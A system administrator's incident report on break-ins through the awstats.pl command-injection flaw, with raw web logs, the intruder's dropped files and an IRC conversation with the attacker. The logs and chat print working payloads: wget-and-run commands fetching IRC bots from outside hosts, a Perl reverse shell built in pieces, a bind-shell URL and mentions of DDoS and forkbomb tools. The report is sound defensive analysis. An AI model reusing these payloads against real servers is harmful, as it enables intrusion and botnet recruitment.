On March 2nd, 2005, a server for which I am responsible received it's first attempted break-in via awstats:
163.19.XX.YY - - [02/Mar/2005:14:46:53 -0600] "GET //cgi/awstats.pl?configdir=| id | HTTP/1.1" 404 404 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

This machine is in Taiwan.

This scouting effort may have been connected with the next attempt:

64.49.XX.YY - - [07/Mar/2005:01:20:12 -0600] "GET /awstats/awstats.pl?configdir=|echo ;cd /tmp;wget vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f57;perl sess_3539283e27d73cae29fe2b80f9293f57;echo ;echo| HTTP/1.1" 404 407 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.49.XX.YY - - [07/Mar/2005:01:20:08 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo ;cd /tmp;wget vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f57;perl sess_3539283e27d73cae29fe2b80f9293f57;echo ;echo| HTTP/1.1" 200 553 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.51.188.2 - - [07/Mar/2005:10:54:47 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo ;cd /tmp;wget http://vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f58;perl sess_3539283e27d73cae29fe2b80f9293f58;echo ;echo| HTTP/1.1" 200 560 "-" "-"
64.51.188.2 - - [07/Mar/2005:11:32:17 -0600] "GET /awstats/awstats.pl?configdir=|echo ;cd /tmp;wget http://vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f58;perl sess_3539283e27d73cae29fe2b80f9293f58;echo ;echo| HTTP/1.1" 404 407 "-" "-"
59.120.XX.YY - - [09/Mar/2005:11:03:16 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo ;cd /tmp;wget vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f59;perl sess_3539283e27d73cae29fe2b80f9293f59;echo ;echo| HTTP/1.1" 200 553 "-" "-"
59.120.XX.YY - - [09/Mar/2005:12:09:17 -0600] "GET /awstats/awstats.pl?configdir=|echo ;cd /tmp;wget vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f59;perl sess_3539283e27d73cae29fe2b80f9293f59;echo ;echo| HTTP/1.1" 404 407 "-" "-"

The 64.51.XX.YY address is a corporation located in Libertyville, IL, but the 59.120.XX.YY address is located in Taiwan, just like the machine which scanned me on 3/2/05. I believe it is safe to assume that these badguys are the same group of people.

Note that this was actually successful, in that they managed to download code to my server. The script they downloaded is "shellbot", apparently written by OldW0lf. The repeated attempts to install this are interesting, and were unexplained to me until later in this incident.

One interesting side effect to this exploit is that the perl code in /var/log/httpd/access_log and /var/log/httpd/error_log confused one of the processes on this machine, a Mandrake 10.0 Official box. The process was /usr/sbin/advxsplitlogfile. This confusion was manifested by that script failing to complete in it's normally allotted time. I noticed this, but was so busy with other projects that I simply manually killed it, and went on to fry bigger fish.

On March 10th came the next attempt:

206.61.XX.YY - - [10/Mar/2005:00:02:45 -0600] "GET //cgi-bin/awstats/awstats.pl?configdir=| id | HTTP/1.1" 404 416 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:45 -0600] "GET //cgi-bin/awstats.pl?configdir=| id | HTTP/1.1" 200 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //cgi/awstats.pl?configdir=| id | HTTP/1.1" 404 404 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //cp/awstats/awstats.pl?configdir=| id | HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //stat-cgi/awstats.pl?configdir=| id | HTTP/1.1" 404 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //awstats/awstats.pl?configdir=| id | HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //awstats/perl/awstats.pl?configdir=| id | HTTP/1.1" 404 413 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
206.61.XX.YY - - [10/Mar/2005:00:02:51 -0600] "GET //awstats/awstats.pl?configdir=| id | HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

This is a machine in Raleigh, NC.

212.88.XX.YY - - [10/Mar/2005:03:32:35 -0600] "GET /awstats/awstats.pl?configdir=|echo ;echo b_exp;kill -9 -1;echo e_exp;%00 HTTP/1.1" 404 407 "-" "-"
212.88.XX.YY - - [10/Mar/2005:03:32:35 -0600] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo ;echo b_exp;kill -9 -1;echo e_exp;%00 HTTP/1.1" 404 415 "-" "-"
212.88.XX.YY - - [10/Mar/2005:03:32:38 -0600] "GET /awstats/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;wget checkingwamu.com/https;perl https;rm -rf http*;ps xc;echo e_exp;%00 HTTP/1.1" 404 407 "-" "-"
212.88.XX.YY - - [10/Mar/2005:03:32:38 -0600] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo ;echo b_exp;w;id;cd /tmp;wget checkingwamu.com/https;perl https;rm -rf http*;ps xc;echo e_exp;%00 HTTP/1.1" 404 415 "-" "-"
212.88.XX.YY - - [10/Mar/2005:03:32:36 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;uname -a;id;echo Instalam bot in /tmp;cd /tmp;wget checkingwamu.com/https;perl https;echo Done;echo e_exp;%00 HTTP/1.1" 200 742 "-" "-"

This machine is located in Austria, but I believe this is a THIRD group of crackers working to gain this machine. The script which I downloaded from checkingwamu.com is a renamed version of "testscript", referenced at https://www.redhat.com/archives/fedora-list/2005-March/msg00516.html .Despite my efforts, I was unable to connect to the IRC channel listed in this script: #xhack (with password cloused), using nick `zup, ircname "clown", realanem "screw", and connecting to the server eu.undernet.org. I am rather unfamiliar with IRC, however, so this is most likely a newbie-ish issue.

Note that checkingwamu.com is located in California.

Next, a site in Britain scanned me:

62.193.XX.YY - - [12/Mar/2005:04:36:48 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo+DTORS_START;id;echo+DTORS_STOP;echo| " 200 546 "-" "-"
62.193.XX.YY - - [12/Mar/2005:04:36:52 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo+DTORS_START;w;echo+DTORS_STOP;echo| " 200 781 "-" "-"
62.193.XX.YY - - [12/Mar/2005:04:37:00 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo+DTORS_START;uname -a;echo+DTORS_STOP;echo| " 200 605 "-" "-"

The final incident happened on 13/Mar/2005:

216.145.XX.YY - - [13/Mar/2005:00:47:35 -0600] "GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 404 416 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:35 -0600] "GET //cgi-bin/awstats.pl HTTP/1.1" 200 3113 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:37 -0600] "GET //cgi/awstats.pl HTTP/1.1" 404 404 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:37 -0600] "GET //stat-cgi/awstats.pl HTTP/1.1" 404 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:37 -0600] "GET //cp/awstats/awstats.pl HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:37 -0600] "GET //awstats/perl/awstats.pl HTTP/1.1" 404 413 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:38 -0600] "GET //stat-cgi/awstats.pl HTTP/1.1" 404 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.145.XX.YY - - [13/Mar/2005:00:47:38 -0600] "GET //awstats/awstats.pl HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

216.145.XX.YY identifies itself as a domain name which is apparently not registered.

62.249.XX.YY - - [13/Mar/2005:09:42:12 -0600] "GET /cgi-bin/awstats.pl HTTP/1.0" 200 3115 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d"
62.249.XX.YY - - [13/Mar/2005:09:42:15 -0600] "GET /cgi-bin/awstats.pl?configdir=|perl -e "print \"#!/usr/bin/perl[LF]use Socket; use IO::Handle; use POSIX; $proto = getprotobyname('tcp');\"" >/var/tmp/.vetx.95| HTTP/1.1" 200 716 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:18 -0600] "GET /cgi-bin/awstats.pl?configdir=|perl -e "print \" socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto); $sin = sockaddr_in(31302,inet_at\"" >>/var/tmp/.vetx.95| HTTP/1.1" 200 717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:20 -0600] "GET /cgi-bin/awstats.pl?configdir=|perl -e "print \"on("62.249.XX.YY" )); connect(Socket_Handle,$sin); dup2(Socket_Handle->fileno, 0); d\"" >>/var/tmp/.vetx.95| HTTP/1.1" 200 717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:21 -0600] "GET /cgi-bin/awstats.pl?configdir=|perl -e "print \"up2(Socket_Handle->fileno, 1); dup2(Socket_Handle->fileno, 2); exec { "/bin/sh" } "";[LF]\"" >>/var/tmp/.vetx.95| HTTP/1.1" 200 717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:23 -0600] "GET /cgi-bin/awstats.pl?configdir=|chmod 755 /var/tmp/.vetx.95| HTTP/1.1" 200 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:28 -0600] "GET /cgi-bin/awstats.pl?configdir=|rm -f /var/tmp/.vetx.95| HTTP/1.1" 200 356 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"
62.249.XX.YY - - [13/Mar/2005:09:42:25 -0600] "GET /cgi-bin/awstats.pl?configdir=|exec /var/tmp/.vetx.95| HTTP/1.1" 200 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)"

62.249.XX.YY is a machine in Norway.

At the same time that this attempt partially succeeded, my route went south, and stopped responding to the world. This is a wonderful happenstance, since it alerted me to the problem. I spotted a process named "s" running as Apache. I then ran my normal backup process (so I would have an image of the compromised machine), and began going through the box to see how far they had gotten.

The bad news is that I was up-to-date on awstats updates from Mandrake, and I was still vulnerable. They have been alerted.

I did a find on 's', and it turned up a new directory: /var/tmp/.cache this directory had the following files:

-rwxr-xr-x  1 apache apache 433332 Mar 13 10:12 0*
-rwxr-xr-x  1 apache apache    147 Jul 29  2004 clear.sh*
-rw-r--r--  1 apache apache    253 Mar 14 08:22 ftp
-rw-r--r--  1 apache apache      0 Mar 14 08:22 Garion.seen
-rwxr-xr-x  1 apache apache 160867 Mar 21  2005 httpd*
-rwxr-xr-x  1 apache apache  24747 Mar 13 10:12 j*
-rwxr-xr-x  1 apache apache  31757 Mar 13 10:12 k*
-rw-r--r--  1 apache apache  22983 Jul 29  2004 mech.help
-rw-r--r--  1 apache apache   1064 Mar 14 08:22 mech.levels
-rw-r--r--  1 apache apache   6734 Mar 13 10:12 mech.pid
-rw-r--r--  1 apache apache    522 Mar 14 08:22 mech.session
-rw-r--r--  1 apache apache    827 Mar 21  2005 mech.set
-rwxr-xr-x  1 apache apache  22158 Mar 13 09:42 s*
-rwxr-xr-x  1 apache apache     61 Mar 21  2005 start.sh*
-rwxr-xr-x  1 apache apache  22446 Mar 13 10:12 v1*
-rwxr-xr-x  1 apache apache  23414 Mar 13 10:12 v2*
-rwxr-xr-x  1 apache apache  26958 Mar 13 10:12 x*

Looking through the energymech settings, I decided to try to connect to the channel. I did! And lo and behold, the hacker was chatty.

Here is the log of the chat:

### Log session started at Mon Mar 14 15:10:19 2005 ###
[15:10:39] |Garion| [~kvirc@earwig.SOMECLIENT.ORG] is now known as IronBar
[15:10:47] <@darks> so
[15:10:53] <@darks> what isp do u work for m8 ?
[15:11:03] <+IronBar> private consultant.
[15:11:12] <@darks> ohh
[15:11:17] <@darks> that's cool
[15:11:24] <@darks> for who ?
[15:11:35] <+IronBar> primarily me.
[15:11:46] <+IronBar> "have keyboard, will travel"
[15:11:46] <@darks> are u upset I fucked the box ?
[15:11:49] IronBar shrugs
[15:12:12] <@darks> I stole the bot from another dude
[15:12:14] <@darks> sorry
[15:12:18] <+IronBar> I think "f'd" is a generous summary of a breakin which didn't include priviledge elevation
[15:12:19] <@darks> so it wasn't me who was 1st in it.
[15:12:43] <+IronBar> The penalties for something like this are big, man.
[15:12:59] <@darks> ahh
[15:13:01] <+IronBar> right now, I'm just curious about the "s" program.
[15:13:04] <@darks> for you, you mean ?
[15:13:12] <+IronBar> in your rootkit.
[15:13:19] <@darks> that's not a rootkit
[15:13:21] <@darks> it's a bot
[15:13:22] <@darks> emech
[15:13:25] <+IronBar> aha.
[15:13:28] <@darks> www.energymech.net
[15:13:34] <+IronBar> interesting.
[15:13:34] <@darks> ./s - stealth
[15:13:38] <@darks> it's a ddos program
[15:14:06] <@darks> ./s IP port
[15:14:08] <+IronBar> ja, I found a few in there.  and some priv elevators.
[15:14:10] <+IronBar> gotcha.
[15:14:11] <@darks> and it sends udp packets to it
[15:14:26] <@darks> I made the bots yesterday
[15:14:32] <@darks> didn't use them much
[15:14:42] <@darks> but another dude got the box also
[15:14:43] <@darks> .keep
[15:14:45] <@darks> I think is his dir
[15:14:49] <@darks> look in /var/tmp
[15:14:51] <@darks> u will see
[15:14:54] <+IronBar> empty.
[15:14:58] <@darks> hmm
[15:15:02] <@darks> well, u erased it ?
[15:15:06] <+IronBar> nope.
[15:15:09] <@darks> ls -la
[15:15:10] <@darks> m8
[15:15:11] <@darks> not ls
[15:15:13] <@darks> ls -la
[15:15:14] <@darks> it's a .
[15:15:16] <@darks> dir
[15:15:17] <@darks> .keep
[15:15:27] <+IronBar> only .cache in /var/tmp
[15:15:41] <@darks> ohh
[15:15:47] <@darks> then it means you removed him from before
[15:15:54] <@darks> but u did not figure out how he got in
[15:16:01] <+IronBar> awstats.pl
[15:16:07] <@darks> yea
[15:16:15] <+IronBar> Popular exploit these days.
[15:16:24] <@darks> yea, it wasn't when I got hold of it
[15:16:30] <@darks> i owned like 200 root@ boxes
[15:16:34] <@darks> and now I steal from suckers
[15:16:53] <@darks> but I mean, I could have killed ur box
[15:17:04] <+IronBar> no, you couldn't have.
[15:17:04] <@darks> Linux earwig.SOMECLIENT.ORG 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 AMD Athlon(tm) XP 2000
[15:17:08] <@darks> wanna bet ?
[15:17:13] <+IronBar> hrm.
[15:17:25] <@darks> it's pretty simple m8
[15:17:27] <@darks> forkbomb it
[15:17:30] <@darks> and it reboots
[15:17:39] <@darks> anyway, it still works to get in
[15:17:47] <+IronBar> What still works to get in?
[15:17:56] <@darks> awstats.pl
[15:18:01] <+IronBar> try it.
[15:18:05] <@darks> ok
[15:18:16] <@darks> root     vc/1      09:27    3:45m  2.17s  0.69s tail -f /var/log/messages
[15:18:17] <@darks> jeremy   pts/0     10:31   30.00s  0.50s  0.02s sshd: jeremy [priv]
[15:18:17] <@darks> mschwarz pts/2     14:21   56:29   0.50s  0.48s top
[15:18:22] <@darks> uid=72(apache) gid=72(apache) groups=72(apache)
[15:18:24] <@darks> ?
[15:18:25] <+IronBar> very good!
[15:18:35] <@darks> oh well, u just need to update m8
[15:18:41] <@darks> I think u try to gather logs
[15:18:45] <@darks> that's not my real IP
[15:18:46] <@darks> :)
[15:18:57] <@darks> stop thinking u are smarter for 1 second.
[15:19:26] <@darks> it's a perl reverse shell
[15:19:31] <@darks> if u're so interested
[15:19:35] <+IronBar> I am.
[15:19:37] <@darks> just remove or update awstats.pl
[15:19:42] <@darks> pretty easy
[15:19:44] <+IronBar> so you're constructing the shell, putting it in /var/tmp, and then executing it.
[15:19:45] <@darks> all it does
[15:19:48] <@darks> yea
[15:19:53] <@darks> that's what the perl does
[15:19:57] <@darks> xploit I mean
[15:20:01] <@darks> it's kinda unique
[15:20:06] <@darks> hence normal lamers do
[15:20:39] <@darks> http://victim/awstats/awstats.pl?confdir=|cd /var/tmp;wget shit.org/bind;chmod +x bind;./bind&|
[15:20:43] <@darks> that will open port 4000
[15:20:45] <@darks> but many 
[15:20:46] <@darks> are 
[15:20:50] <@darks> blocked from the outside
[15:20:52] <+IronBar> interesting.
[15:21:03] <@darks> anyway, mine tryes to connect back from inside
[15:21:07] <@darks> not many have that blocked
[15:21:08] <@darks> :)
[15:21:22] <@darks> so imagine I get 50% more boxes than them.
[15:21:45] <+IronBar> I'm not sure I follow...
[15:22:05] <@darks> the shell
[15:22:09] <@darks> connects back to my box
[15:22:12] <@darks> it's a reverse shell
[15:22:24] <@darks> most firewall aren't configured to block outgoing connections
[15:22:25] <@darks> :)
[15:22:31] <@darks> only 10%
[15:22:38] <@darks> they only block outside connections.
[15:22:45] <+IronBar> Your average NAT box wants to let inside connections out.
[15:23:00] <@darks> yea
[15:23:02] <@darks> all of them
[15:23:11] <@darks> I mean, u want to be able to connect to any host on any port
[15:23:28] <@darks> but for example
[15:23:33] <@darks> if I would have started a bind on it
[15:23:36] <@darks> on port 4000
[15:23:40] <@darks> I couldn't have connected to the box
[15:23:44] <@darks> since 4000 is closed at ur box.
[15:23:55] <@darks> u have only the necessary ports open
[15:24:02] <+IronBar> I do my best :/
[15:24:05] <@darks> 2.6.3
[15:24:10] <@darks> I think root@ works on that one
[15:24:12] <@darks> never tried
[15:24:15] <@darks> I suggest u get this
[15:24:25] <@darks> chkrootkit
[15:24:27] <@darks> or rkhunter
[15:24:31] <+IronBar> ja.  ran rkhunter
[15:24:32] <@darks> it's a 2000 box
[15:24:34] <@darks> as I see now
[15:24:40] <@darks> or not
[15:24:43] <@darks> the processor is xp
[15:24:44] <@darks> lol
[15:24:47] <@darks> ahtlon, sorry
[15:24:52] <+IronBar> no worries
[15:24:57] <@darks> I can try to get root
[15:24:59] <@darks> if u want
[15:25:02] <@darks> I have an exploit
[15:25:07] <@darks> that works on that
[15:25:36] <@darks> check ssh
[15:25:39] <@darks> for a backdoor
[15:25:43] <@darks> the md5 :)
[15:26:04] <+IronBar> md5sum checks out
[15:26:26] <@darks> then noone modified it
[15:26:32] IronBar nods
[15:26:41] <@darks> but I am pretty sure root@ works
[15:26:44] <@darks> can I try?
[15:26:51] <+IronBar> hold on  brb
[15:26:58] <@darks> ok
[15:30:38] <+IronBar> phone call.
[15:30:41] <+IronBar> off phone now.
[15:30:42] <@darks> ok
[15:30:46] <@darks> ok
[15:30:51] <@darks> well, can I try to get root@ ?
[15:31:00] <+IronBar> how does it work?
[15:31:04] <+IronBar> buffer overflow in kernel?
[15:31:13] <@darks> yea, kinda
[15:31:16] <+IronBar> give me a few moments before you try it.
[15:31:20] <@darks> ok
[15:31:32] <+IronBar> that machine is in the middle of updating something, and I want it in a known state first.
[15:31:56] <@darks> ahh
[15:31:58] <@darks> ok m8
[15:32:05] <@darks> u are on the machine
[15:32:11] IronBar nods
[15:34:51] darks is darks!~lightb@thunder.users.undernet.org
[15:34:51] darks's real name: G.T.
[15:34:51] darks's channels: @#ircblows, @#spys, @#ahley, @#thesecret
[15:34:51] darks's server: *.undernet.org - The Undernet Underworld
[15:34:51] darks's info: is logged in as
[15:34:51] darks WHOIS info from graz.at.Eu.UnderNet.org
[15:36:42] drunkb is drunkb!~lightb@drunkagain.org
[15:36:42] drunkb's real name: lightb
[15:36:42] drunkb's channels: @#thesecret
[15:36:42] drunkb's server: *.undernet.org - The Undernet Underworld
[15:36:42] drunkb WHOIS info from graz.at.Eu.UnderNet.org
[15:36:56] IronBar is IronBar!~kvirc@earwig.SOMECLIENT.ORG
[15:36:56] IronBar's real name: Using KVIrc 3.2.0 'Realia'
[15:36:56] IronBar's channels: +#thesecret
[15:36:56] IronBar's server: graz.at.Eu.UnderNet.org - TU-Graz, Austria
[15:36:56] IronBar's idle time: 0d 0h 4m 45s
[15:36:56] IronBar's signon time: Mon Mar 14 12:16:01 2005
[15:36:56] IronBar WHOIS info from graz.at.Eu.UnderNet.org
[15:37:07] <@darks> k
[15:37:12] <@darks> let me know when u are ready
[15:37:14] <@darks> meanwhile
[15:37:18] <@darks> what connection do u have?
[15:37:20] <@darks> not a good one, I think
[15:37:23] <+IronBar> it'll be a bit.
[15:37:25] <@darks> if u found me so fast.
[15:37:30] <+IronBar> ?
[15:37:34] <+IronBar> why do you say?
[15:37:38] <@darks> well, I packet from this nac box
[15:37:41] <@darks> for 2 weeks now
[15:37:45] <@darks> noone noticed.
[15:37:50] <@darks> and 24 hour ddoses
[15:37:54] <@darks> not 5 mins.
[15:38:18] <+IronBar> I don't understand why you say I have a bad connection?
[15:40:22] <@darks> u noticed
[15:40:24] <@darks> the ddos fast
[15:40:24] <@darks> :)
[15:40:33] <+IronBar> ah.  
[15:40:35] IronBar shrugs
[15:40:35] <@darks> fe
[15:40:37] <@darks> that's
[15:40:40] <@darks> 155Mbit
[15:40:45] <@darks> and u are 2 hops lower
[15:40:49] <@darks> so u have a t1 ?
[15:40:56] <+IronBar> not sure what this site has
[15:41:16] <@darks> well, it's a t1
[15:41:25] <@darks> 11  64.122.229.17 (64.122.229.17)  358.752 ms  366.397 ms  366.876 ms
[15:41:26] <@darks> very slow
[15:41:27] <@darks> wtf
[15:41:31] <@darks> are u downloading ?
[15:41:41] <+IronBar> xferring files to site2
[15:42:09] <@darks> well, that's why
[15:42:41] <@darks> it's ok anyway
[15:42:46] <@darks> i don't harm the boxes
[15:42:49] <@darks> I just packet from them
[15:42:53] <@darks> yesterday I made 80 bots
[15:42:57] <@darks> i got pissed on this dude
[15:43:00] <@darks> lame motherfucker
[15:43:06] <@darks> 4 hours and I was done, then i owned his ass.
[15:43:11] <@darks> I don't usually packet
[15:44:54] <+IronBar> brb
[16:29:18] <@darks> Garion__ -nick jesskitty
[16:29:19] Garion__ [~garion@64.224.10.49] is now known as jesskitty
[16:29:25] <@darks> jesskitty -join #ircblows
[16:29:29] <@darks> jesskitty -away
[16:29:39] <@darks> jesskitty -away  I GOT GENITAL HERPES BOYS, LET ME HAVE IT.
[16:30:30] darks [~lightb@thunder.users.undernet.org] has set channel mode +stn
[17:01:14] darks [~lightb@thunder.users.undernet.org] has quit IRC: Ping timeout
[17:06:21] _darks [lightb@drittsekk.net] has joined #thesecret
### Log session terminated at Mon Mar 14 20:10:10 2005 ###

Analysis of the server shows that the cracker was never able to elevate priviledge beyond that of user Apache. rkhunter declared the machine clean, and I promptly upgraded all necessary software. I've also removed unused software from that machine. Furthermore, I ran md5sum against all binaries and compared the result to a known good machine, and everything came up clean. There were no suspicious logfile entries, or gaps in the logfiles.

Overall, even though Mandrake has a reputation for being insecure, I'm fairly happy with the result--we had a hole, it was exploited, the bad guys never got control of the machine. Obviously, I'd be happiest if the hole had been fixed before it was cracked--particularly since this exploit has been known since January.